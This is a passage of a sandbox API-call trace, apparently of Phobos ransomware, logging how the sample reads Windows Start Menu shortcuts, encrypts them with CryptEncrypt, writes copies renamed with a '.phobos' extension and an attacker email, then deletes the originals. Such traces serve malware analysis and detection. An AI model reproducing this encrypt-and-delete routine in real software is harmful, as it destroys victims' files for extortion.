Office\\Microsoft InfoPath Filler 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.172] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.172] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.172] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.172] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.173] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0177.173] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.173] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xbd2, lpOverlapped=0x0) returned 1 [0177.198] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xbe0, dwBufLen=0xbe0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xbe0) returned 1 [0177.198] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xbe0, lpOverlapped=0x0) returned 1 [0177.199] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32da8) returned 1 [0177.199] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.199] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0177.199] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.199] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0177.199] CryptDestroyKey (hKey=0xa32c68) returned 1 [0177.199] CloseHandle (hObject=0x180) returned 1 [0177.199] CloseHandle (hObject=0x158) returned 1 [0177.199] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk")) returned 1 [0177.207] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.208] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2751) returned 1 [0177.208] CloseHandle (hObject=0x180) returned 1 [0177.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk")) returned 0x20 [0177.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.208] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.208] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0177.209] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0177.209] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.209] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xabf, lpOverlapped=0x0) returned 1 [0177.210] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xac0, dwBufLen=0xac0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xac0) returned 1 [0177.210] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xac0, lpOverlapped=0x0) returned 1 [0177.211] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32da8) returned 1 [0177.211] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.211] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80, dwBufLen=0x80 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80) returned 1 [0177.211] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.211] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x132, lpOverlapped=0x0) returned 1 [0177.211] CryptDestroyKey (hKey=0xa32c68) returned 1 [0177.211] CloseHandle (hObject=0x180) returned 1 [0177.211] CloseHandle (hObject=0x134) returned 1 [0177.212] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk")) returned 1 [0177.213] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.213] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.220] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2837) returned 1 [0177.220] CloseHandle (hObject=0x180) returned 1 [0177.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk")) returned 0x20 [0177.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.220] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.220] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.220] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.220] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.221] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0177.221] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.221] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xb15, lpOverlapped=0x0) returned 1 [0177.244] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb20, dwBufLen=0xb20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb20) returned 1 [0177.245] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xb20, lpOverlapped=0x0) returned 1 [0177.245] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0177.245] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.245] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0177.245] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.245] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0177.245] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.246] CloseHandle (hObject=0x180) returned 1 [0177.246] CloseHandle (hObject=0x188) returned 1 [0177.246] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk")) returned 1 [0177.262] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.262] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.262] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3029) returned 1 [0177.262] CloseHandle (hObject=0x188) returned 1 [0177.263] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk")) returned 0x20 [0177.263] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.263] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.263] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.263] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.263] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.264] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0177.264] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.264] ReadFile (in: hFile=0x188, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xbd5, lpOverlapped=0x0) returned 1 [0177.317] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xbe0, dwBufLen=0xbe0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xbe0) returned 1 [0177.317] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xbe0, lpOverlapped=0x0) returned 1 [0177.326] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0177.326] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.326] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0177.326] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.326] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0177.327] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.327] CloseHandle (hObject=0x188) returned 1 [0177.327] CloseHandle (hObject=0x180) returned 1 [0177.327] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Outlook 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft outlook 2010.lnk")) returned 1 [0177.328] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.328] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.329] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3055) returned 1 [0177.329] CloseHandle (hObject=0x180) returned 1 [0177.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk")) returned 0x20 [0177.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.329] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.329] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.329] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.329] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.330] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0177.330] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.330] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xbef, lpOverlapped=0x0) returned 1 [0177.372] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xbf0, dwBufLen=0xbf0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xbf0) returned 1 [0177.372] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xbf0, lpOverlapped=0x0) returned 1 [0177.373] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0177.373] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.373] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0177.373] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.373] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0177.373] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.373] CloseHandle (hObject=0x180) returned 1 [0177.373] CloseHandle (hObject=0x188) returned 1 [0177.374] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk")) returned 1 [0177.375] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Sidebar.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sidebar.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.375] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1330) returned 1 [0177.375] CloseHandle (hObject=0x188) returned 1 [0177.375] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Sidebar.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sidebar.lnk")) returned 0x20 [0177.375] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Sidebar.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sidebar.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Sidebar.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\sidebar.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 